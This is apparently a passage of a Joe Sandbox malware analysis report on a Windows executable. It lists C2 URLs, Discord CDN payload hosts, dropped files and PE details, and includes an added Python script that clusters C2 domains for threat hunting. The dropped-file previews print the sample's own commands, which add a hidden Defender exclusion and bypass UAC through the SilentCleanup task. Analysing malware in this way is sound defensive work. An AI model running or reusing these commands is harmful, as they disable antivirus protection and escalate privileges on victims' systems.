81.17.18.198 | Yw5acDrhKd.exe | malicious | www.stonescapes1.com/de92/?FD=Txo8n6BX_BmT&vBZ=FMDFc6rLlu1wjKmkr6r3BpbflKlZCzzEN16L5n5vdoOueqP/ceb71sNk2lFVYB6w7T0O
81.17.18.198 | ant.exe | malicious | www.wwwmmcguard.com/94sb/?8pMt5xHX=RFLrXxcYp0hG0BbLPC4a8F4Mq8oCwTW9r4roPbGrPgAFBAFkro9ZoKsd4hZYJcmKRPJ1&GzrT=Wb1LdRq8x
81.17.18.198 | http://gmai.com | malicious | gmai.com/
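The context rows for 54.147.194.143 and 81.17.18.198 share one URL shape: www.<domain>/<short path token>/ with either no query or a pair of random-looking parameters, one of them carrying a long opaque value, and the same token recurring across several domains (chue, gwam, kio8, nwc9, de92). The script below is an added example, not part of the Joe Sandbox report: it parses URLs copied from the table into host, token and query, applies a heuristic match for that shape, and groups matching hosts by token so the domains of one campaign cluster together. The threshold and helper names are the example's own, and the heuristic is a pivot aid, not a FormBook signature.

```python
"""Parse FormBook-style C2 URLs into pivotable indicators.

Added example; not part of the Joe Sandbox report.  The URLs below are
copied from the "IPs" context table above (plus one unrelated entry from
the same table) so the script runs offline.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: a subset of the context table's URLs, copied verbatim.
SAMPLE_URLS = [
    "www.allerganacademy.sucks/vfm2/?k2MdtP=LmFdZ9gjDIx/1thg2qAIjzQWq3wditgwII2kAns7Fui9uD9OwA4ibKKgDMWgv+lmRomT&NZitYp=zL3h2V_pyz",
    "www.atlantahawks.sucks/chue/?EzutZl=3fX08rZHUH-&EhA8R=23tAecEcPN8lPSjAKWGAYBo9TuLRqN5pN+TNZjQiP5W8VE+UFQGW1PlnZKfKox5lfqrZ",
    "www.axawinterthur.sucks/chue/",
    "www.bostonredsox.sucks/gwam/?Iry=lxg6dPe+nZwYSNNU17vceoxbNFwjbhB8pjLqYUtkOCdsIUy1dVr3af5pAhDK953TEkSh&ob30vr=S0Glx8",
    "www.daytondailynews.sucks/gwam/?xVMtBLt0=dHil0CD4Vm8Yd4bFV13fVQ+sh0vKAzZyH2Hr0rX4756hSyETdw3IGIf6M/SoKAKDfxID&1bw=Lhe8eJi8jXTPbflp",
    "www.craftsman.sucks/nwc9/?LX9p=vufb9ZM0L2UqzR4cq9a0Vq9xTXcRUo0aJVq1+zhILIc0v3ImCtITmP0HrsJqsFS70ieg&MnZ=GXLtz",
    "gmai.com/",  # unrelated row from the same table; must not match
]

# One short lower-case alphanumeric directory and nothing else in the path.
PATH_TOKEN = re.compile(r"^/([a-z0-9]{2,5})/$")

# Hypothetical threshold: the opaque parameter in these rows is well over
# 40 characters, so this separates it from the short second parameter.
LONG_VALUE = 40


def parse_c2_url(url):
    """Split a scheme-less URL into host, path token and raw query pairs.

    The query is split by hand instead of parse_qsl so '+' and '/' inside
    the opaque value survive untouched (parse_qsl would turn '+' into ' ').
    """
    parts = urlsplit("http://" + url)
    m = PATH_TOKEN.match(parts.path)
    params = []
    for kv in parts.query.split("&"):
        if kv:
            key, _, value = kv.partition("=")
            params.append((key, value))
    return {"host": parts.hostname, "token": m.group(1) if m else None, "params": params}


def looks_like_formbook_beacon(rec):
    """Heuristic shape match, not a signature.

    Matches www.<domain>/<token>/ with either no query (the bare check-in
    rows above) or exactly two parameters of which one carries a long
    opaque value.  Legitimate sites can produce similar URLs, so treat a hit
    as a pivot to verify, not as a verdict.
    """
    if rec["token"] is None or not rec["host"].startswith("www."):
        return False
    if not rec["params"]:
        return True
    if len(rec["params"]) != 2:
        return False
    return any(len(value) >= LONG_VALUE for _, value in rec["params"])


def group_by_token(records):
    """Group matching hosts by path token; the table shows the same token
    reused across several domains, so this clusters a campaign's hosts."""
    groups = defaultdict(set)
    for rec in records:
        if looks_like_formbook_beacon(rec):
            groups[rec["token"]].add(rec["host"])
    return {token: sorted(hosts) for token, hosts in groups.items()}


if __name__ == "__main__":
    for token, hosts in group_by_token([parse_c2_url(u) for u in SAMPLE_URLS]).items():
        print(token, hosts)
```

Running it on the embedded rows yields four token groups, with chue and gwam each holding two hosts; fed with a proxy log instead of the table, the same grouping turns one confirmed host into a short list of sibling domains to block or hunt for.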

                                                                      Domains

Match | Associated Sample Name / URL | Detection | Context
cdn.discordapp.com | New Order PO2193570O1.doc | malicious | 162.159.134.233
cdn.discordapp.com | crt9O3URua.exe | malicious | 162.159.135.233
cdn.discordapp.com | qdAbNSGIbq.exe | malicious | 162.159.129.233
cdn.discordapp.com | o8RYFTZsuU.exe | malicious | 162.159.129.233
cdn.discordapp.com | MrjC4jkPL8.exe | malicious | 162.159.129.233
cdn.discordapp.com | p8Wo6PbOjL.exe | malicious | 162.159.130.233
cdn.discordapp.com | Lista e porosive.exe | malicious | 162.159.129.233
cdn.discordapp.com | Sleek_Free.exe | malicious | 162.159.133.233
cdn.discordapp.com | MESCO TQZ24 QUOTE.exe | malicious | 162.159.134.233
cdn.discordapp.com | 64gfv9wUm1.exe | malicious | 162.159.134.233
cdn.discordapp.com | DPSGNwkO1Z.exe | malicious | 162.159.134.233
cdn.discordapp.com | nU8kVKVAc8.exe | malicious | 162.159.134.233
cdn.discordapp.com | 3Dhjb2xzpW.exe | malicious | 162.159.130.233
cdn.discordapp.com | f2hwO1fUs5.exe | malicious | 162.159.135.233
cdn.discordapp.com | New order_doc.exe | malicious | 162.159.133.233
cdn.discordapp.com | New order_doc.lzh | malicious | 162.159.134.233
cdn.discordapp.com | TT Copy,xlsx.exe | malicious | 162.159.130.233
cdn.discordapp.com | teX5sUCWAg.exe | malicious | 162.159.130.233
cdn.discordapp.com | teX5sUCWAg.exe | malicious | 162.159.135.233
cdn.discordapp.com | POD0608.doc | malicious | 162.159.134.233

                                                                      ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS | 01ekkRSMzb.dll | malicious | 104.20.185.68
CLOUDFLARENETUS | Invoice_OS169ENG 000003893148.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | Purchase Order.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | INVOICE.exe | malicious | 104.21.29.70
CLOUDFLARENETUS | Request Quotation.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | 8BDBD0yy0q.apk | malicious | 172.67.169.41
CLOUDFLARENETUS | Shipment Invoice & Consignment Notification.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | 8BDBD0yy0q.apk | malicious | 172.67.169.41
CLOUDFLARENETUS | w4X8dxtGi6.exe | malicious | 172.67.163.99
CLOUDFLARENETUS | St3aq2ELIJ.exe | malicious | 104.21.2.30
CLOUDFLARENETUS | KY4cmAI0jU.exe | malicious | 172.67.206.33
CLOUDFLARENETUS | w1iSiwLXiV.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | TKeRmCuiit.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | c71fd2gJus.exe | malicious | 172.67.222.38
CLOUDFLARENETUS | BrBsL8sBvm.exe | malicious | 172.67.188.69
CLOUDFLARENETUS | New Order PO2193570O1.doc | malicious | 162.159.134.233
CLOUDFLARENETUS | Proforma Invoice.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | 00010200390_0192021.pdf.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | Payment Advice.pdf.doc | malicious | 104.21.19.200
CLOUDFLARENETUS | Urgent Contract Order GH7856648,pdf.exe | malicious | 172.67.188.154
PLI-ASCH | scan copy.rr1.exe | malicious | 81.17.18.196
PLI-ASCH | Julie.randall Completed REFERRAL AGREEMENT 60926.html | malicious | 179.43.134.182
PLI-ASCH | 03062021.exe | malicious | 81.17.18.197
PLI-ASCH | as.exe | malicious | 179.43.140.150
PLI-ASCH | Brett.sutton REFERRAL AGREEMENT 03, Jun 2021 3444.html | malicious | 179.43.134.182
PLI-ASCH | YH6Zy2Q5e2.doc | malicious | 179.43.140.150
PLI-ASCH | Payment_Advice.exe | malicious | 81.17.18.196
PLI-ASCH | Swift copy_9808.exe | malicious | 81.17.18.197
PLI-ASCH | E4T88Y4IMi.doc | malicious | 179.43.140.150
PLI-ASCH | 1092991(JB#082).exe | malicious | 81.17.18.194
PLI-ASCH | Makbuz kopyas#U0131 onayland#U0131 5.26.21.exe | malicious | 81.17.18.197
PLI-ASCH | PI1942100023.exe | malicious | 81.17.18.198
PLI-ASCH | POSWM240521.exe | malicious | 81.17.18.198
PLI-ASCH | KJN55hQKh2.exe | malicious | 141.255.162.34
PLI-ASCH | TNT AWB N0 - 6278216733.exe | malicious | 46.19.137.116
PLI-ASCH | Purchase Order.exe | malicious | 81.17.18.194
PLI-ASCH | Patch.exe | malicious | 179.43.140.174
PLI-ASCH | 15%.exe | malicious | 179.43.140.174
PLI-ASCH | invoice.exe | malicious | 81.17.18.194
PLI-ASCH | malicious.js | malicious | 190.211.254.101
AMAZON-AESUS | 444890321.exe | malicious | 35.169.40.107
AMAZON-AESUS | 8BDBD0yy0q.apk | malicious | 3.213.149.159
AMAZON-AESUS | 8BDBD0yy0q.apk | malicious | 3.210.126.214
AMAZON-AESUS | c71fd2gJus.exe | malicious | 107.23.214.167
AMAZON-AESUS | E1a92ARmPw.exe | malicious | 34.205.91.18
AMAZON-AESUS | crt9O3URua.exe | malicious | 34.205.91.18
AMAZON-AESUS | E1a92ARmPw.exe | malicious | 34.205.91.18
AMAZON-AESUS | triage_dropped_file.dll | malicious | 23.23.104.250
AMAZON-AESUS | o53icSdh9N.exe | malicious | 34.202.33.33
AMAZON-AESUS | qdAbNSGIbq.exe | malicious | 52.204.109.97
AMAZON-AESUS | DNPr7t0GMY.exe | malicious | 54.85.86.211
AMAZON-AESUS | omh.dll | malicious | 23.21.205.229
AMAZON-AESUS | fTxhRIDnrC.dll | malicious | 34.201.169.54
AMAZON-AESUS | Letter 09JUN 2021.xlsx | malicious | 54.85.86.211
AMAZON-AESUS | XumsQCALnX.exe | malicious | 54.235.190.106
AMAZON-AESUS | MV SHUHA QUEEN.docx | malicious | 54.83.52.76
AMAZON-AESUS | MV SHUHA QUEEN.docx | malicious | 54.83.52.76
AMAZON-AESUS | Docc.html | malicious | 52.44.21.50
AMAZON-AESUS | ManyToOneMailMerge Ver 18.2.dotm | malicious | 34.236.65.196
AMAZON-AESUS | Sleek_Free.exe | malicious | 52.2.188.208

                                                                      JA3 Fingerprints

                                                                      Match: 37f463bf4616ecd445d4a1937da06e19

                                                                      Associated Sample Name / URL                          Detection   Context
                                                                      audit-1133808478.xlsb                                 malicious   162.159.135.233
                                                                      tXkin8g4sy.exe                                        malicious   162.159.135.233
                                                                      xGrfj8RvYg.exe                                        malicious   162.159.135.233
                                                                      my_attach_82862.xlsb                                  malicious   162.159.135.233
                                                                      document-47-2637.xls                                  malicious   162.159.135.233
                                                                      logo.png.exe                                          malicious   162.159.135.233
                                                                      document-47-2637.xls                                  malicious   162.159.135.233
                                                                      Fax_Doc#01_5.html                                     malicious   162.159.135.233
                                                                      wa71myDkbQ.exe                                        malicious   162.159.135.233
                                                                      Current-Status-062021-81197.xlsb                      malicious   162.159.135.233
                                                                      logo.png.exe                                          malicious   162.159.135.233
                                                                      3F97s4aQjB.xlsx                                       malicious   162.159.135.233
                                                                      WcCEh3daIE.xls                                        malicious   162.159.135.233
                                                                      ATT00005.htm                                          malicious   162.159.135.233
                                                                      kxjeAvsg1v.exe                                        malicious   162.159.135.233
                                                                      VSA75RUmYZ.exe                                        malicious   162.159.135.233
                                                                      iX22xMeXIc.exe                                        malicious   162.159.135.233
                                                                      QWkt5w3cO2.exe                                        malicious   162.159.135.233
                                                                      #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM     malicious   162.159.135.233
                                                                      vTtOheCXBQ.exe                                        malicious   162.159.135.233

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\Public\KDECO.bat
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):155
                                                                      Entropy (8bit):4.687076340713226
                                                                      Encrypted:false
                                                                      SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                                                      MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                                                      SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                                                      SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                                                      SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                                                      C:\Users\Public\Trast.bat
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):34
                                                                      Entropy (8bit):4.314972767530033
                                                                      Encrypted:false
                                                                      SSDEEP:3:LjTnaHF5wlM:rnaHSM
                                                                      MD5:4068C9F69FCD8A171C67F81D4A952A54
                                                                      SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                                                                      SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                                                                      SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                                                                      Malicious:false
                                                                      Preview: start /min C:\Users\Public\UKO.bat
                                                                      C:\Users\Public\UKO.bat
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):250
                                                                      Entropy (8bit):4.865356627324657
                                                                      Encrypted:false
                                                                      SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                                                                      MD5:EAF8D967454C3BBDDBF2E05A421411F8
                                                                      SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                                                                      SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                                                                      SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                                                                      Malicious:false
                                                                      Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                                                                      C:\Users\Public\nest
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):9
                                                                      Entropy (8bit):3.169925001442312
                                                                      Encrypted:false
                                                                      SSDEEP:3:v6Sn:pn
                                                                      MD5:B34CDA3AD70900BC497BBF541CA56028
                                                                      SHA1:F60AF6A109961F618F07B4859765551C83C5BC29
                                                                      SHA-256:52528941C375DA2A333D86CB4D35BED7B616CFA9B540E4D1C3969D5F10DBD872
                                                                      SHA-512:97343B6470D00EAB34AC932AFB6C8F8B7B4B8EFFD569E4854CA6EB4CF9DD18188C339070595CF10D56963EF63F94073B1A73FA6C15FB4023B936E249E58148BD
                                                                      Malicious:false
                                                                      Preview: Rvsqdib..
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Rvsqdibldhhwoyydhsqrllstcbdszox[1]
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:data
                                                                      Category:downloaded
                                                                      Size (bytes):278528
                                                                      Entropy (8bit):7.587141305649266
                                                                      Encrypted:false
                                                                      SSDEEP:6144:oFOVTV/0na+54rRldsdjInoHYKss/z/wT23rZWG48Ds:oATVsnarXsCnuYDIz/O27ZLDs
                                                                      MD5:3B2E70B2C34A9CCD9C0CC8C3259D4684
                                                                      SHA1:5D526A1F60C98D3B0C0BE016CC13A15A281B0665
                                                                      SHA-256:A4264F980716E7401453A763B259569E51E94D9B43AA32B5F07987D2EB44A798
                                                                      SHA-512:8647C0D8981B034052AF03055594A676BCCA089F6FF1CC5A62CCFD551A0260A5C68B8942AEDDCB05B381FB74506AE0BBBF54F69D0B41A2C6FD2B02BFD4D6A8F2
                                                                      Malicious:false
                                                                      IE Cache URL:https://cdn.discordapp.com/attachments/848561010100273222/851346956201623552/Rvsqdibldhhwoyydhsqrllstcbdszox
                                                                      Preview: ~)........@.00..............................................2.....P.:.R.2..R__#7...?A..A....C.1..A.=.=3.A.=d.>..h.........................................................................................................................................v...2..J-...........].<2.J.?2........gC2......O2............................../............2..................................o2..@...2.Y....................2..N..................................................................................t..v....=2......?2..................../.r#r....@...O2......E2........................Z...._2......U2..................3.C....@...o2......U2.................A.;.....N....2......e2..................A.A....Y...2..[...2..............................2......2.........................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.215488497688755
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                      • InstallShield setup (43055/19) 0.43%
                                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                      File name:3.exe
                                                                      File size:1081696
                                                                      MD5:21f077fa0e739f6174e2452abc30bb7c
                                                                      SHA1:9d60988db53eb662eb6a8e2f824036348f5e7ec0
                                                                      SHA256:6f536ae781fd98358126408aa6991b4bb3ec3f9940929a22b25f785b71ec770d
                                                                      SHA512:33e9b0e9d0f7897aa56c69187f8e797b695e729774afa9f81a23618443cd11911c10777dfc1af6294135c3a16df6b23942c7f8f2ee3fcb3522c4ebe77c9af38e
                                                                      SSDEEP:12288:D1cg+pOHH8f/6xUJ492ctspCbQHA8N44Oo40vqX0uNb+T0HXX+jBnnXLVgKR3mEx:D1BjH8f/6AwbL24Eq/XQBmEsG
                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:b2b89c8eaebafe6a

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x45918c
                                                                      Entrypoint Section:CODE
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:e077016a28329385307019c238609f17

                                                                      Authenticode Signature

                                                                      Signature Valid:false
                                                                      Signature Issuer:CN=VeriSign Class 3 Code Signing 2009-2 CA, OU=Terms of use at https://www.verisign.com/rpa (c)09, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                      Error Number:-2146869232
                                                                      Not Before, Not After
                                                                      • 2/23/2010 4:00:00 PM 2/24/2011 3:59:59 PM
                                                                      Subject Chain
                                                                      • CN=Ralink Technology Corporation, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Ralink Technology Corporation, L="Hsin-Chu, Taiwan", S=Taiwan, C=TW
                                                                      Version:3
                                                                      Thumbprint MD5:F713EBAED78D8C12DB295D8908F3411E
                                                                      Thumbprint SHA-1:E3143F0DF21FCED02FE5525B297ED4CD389C66E3
                                                                      Thumbprint SHA-256:7C0D94CA9C871E324302C124373A5A00346E3C8206FF4CCC1024EC558F195D7D
                                                                      Serial:54CC50D147FA549E3F721C754E4E3A91

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFFF0h
                                                                      mov eax, 00458F84h
                                                                      call 00007EFDC0BF891Dh
                                                                      mov eax, dword ptr [0045B2C8h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007EFDC0C476ADh
                                                                      mov ecx, dword ptr [0045B3E4h]
                                                                      mov eax, dword ptr [0045B2C8h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov edx, dword ptr [004585E8h]
                                                                      call 00007EFDC0C476ADh
                                                                      mov eax, dword ptr [0045B2C8h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov byte ptr [eax+5Bh], 00000000h
                                                                      mov eax, dword ptr [0045B2C8h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007EFDC0C47716h
                                                                      call 00007EFDC0BF67E5h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x5d000          0x218e        .idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x69000          0xa4318       .rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x106c00         0x1560        .rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x62000          0x663c        .reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS             0x61000          0x18          .rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                      Sections

                                                                      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                                      CODE    0x1000           0x581dc       0x58200   False     0.528277371454   data       6.5233234465    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      DATA    0x5a000          0x1440        0x1600    False     0.409268465909   data       4.02531912918   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      BSS     0x5c000          0xd71         0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .idata  0x5d000          0x218e        0x2200    False     0.367417279412   data       5.00766448611   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .tls    0x60000          0x10          0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .rdata  0x61000          0x18          0x200     False     0.05078125       data       0.160858762351  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .reloc  0x62000          0x663c        0x6800    False     0.610314002404   data       6.63947907273   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .rsrc   0x69000          0xa4318       0xa4400   False     0.140138948345   data       5.15891276742   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x69d90 | 0x134 | data | |
RT_CURSOR | 0x69ec4 | 0x134 | data | English | United States
RT_BITMAP | 0x69ff8 | 0x1d0 | data | |
RT_BITMAP | 0x6a1c8 | 0x1e4 | data | |
RT_BITMAP | 0x6a3ac | 0x1d0 | data | |
RT_BITMAP | 0x6a57c | 0x1d0 | data | |
RT_BITMAP | 0x6a74c | 0x1d0 | data | |
RT_BITMAP | 0x6a91c | 0x1d0 | data | |
RT_BITMAP | 0x6aaec | 0x1d0 | data | |
RT_BITMAP | 0x6acbc | 0x1d0 | data | |
RT_BITMAP | 0x6ae8c | 0x1d0 | data | |
RT_BITMAP | 0x6b05c | 0x1d0 | data | |
RT_BITMAP | 0x6b22c | 0x128 | data | |
RT_BITMAP | 0x6b354 | 0x128 | data | |
RT_BITMAP | 0x6b47c | 0x128 | data | |
RT_BITMAP | 0x6b5a4 | 0xe8 | data | |
RT_BITMAP | 0x6b68c | 0x128 | data | |
RT_BITMAP | 0x6b7b4 | 0x128 | data | |
RT_BITMAP | 0x6b8dc | 0xd0 | data | |
RT_BITMAP | 0x6b9ac | 0x128 | data | |
RT_BITMAP | 0x6bad4 | 0x128 | data | |
RT_BITMAP | 0x6bbfc | 0x128 | data | |
RT_BITMAP | 0x6bd24 | 0x128 | data | |
RT_BITMAP | 0x6be4c | 0x128 | data | |
RT_BITMAP | 0x6bf74 | 0xe8 | data | |
RT_BITMAP | 0x6c05c | 0x128 | data | |
RT_BITMAP | 0x6c184 | 0x128 | data | |
RT_BITMAP | 0x6c2ac | 0xd0 | data | |
RT_BITMAP | 0x6c37c | 0x128 | data | |
RT_BITMAP | 0x6c4a4 | 0x128 | data | |
RT_BITMAP | 0x6c5cc | 0x128 | data | |
RT_BITMAP | 0x6c6f4 | 0x128 | data | |
RT_BITMAP | 0x6c81c | 0x128 | data | |
RT_BITMAP | 0x6c944 | 0xe8 | data | |
RT_BITMAP | 0x6ca2c | 0x128 | data | |
RT_BITMAP | 0x6cb54 | 0x128 | data | |
RT_BITMAP | 0x6cc7c | 0xd0 | data | |
RT_BITMAP | 0x6cd4c | 0x128 | data | |
RT_BITMAP | 0x6ce74 | 0x128 | data | |
RT_BITMAP | 0x6cf9c | 0xe8 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x6d084 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x6d4ec | 0x988 | data | English | United States
RT_ICON | 0x6de74 | 0x10a8 | data | English | United States
RT_ICON | 0x6ef1c | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 240, next used block 251658240 | English | United States
RT_RCDATA | 0x73144 | 0x66d | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | English | United States
RT_RCDATA | 0x737b4 | 0x10 | data | |
RT_RCDATA | 0x737c4 | 0x3b080 | PC bitmap, Windows 3.x format, 314 x 160 x 4 | English | United States
RT_RCDATA | 0xae844 | 0x5e77a | Delphi compiled form 'TForm2' | |
RT_GROUP_CURSOR | 0x10cfc0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0x10cfd4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
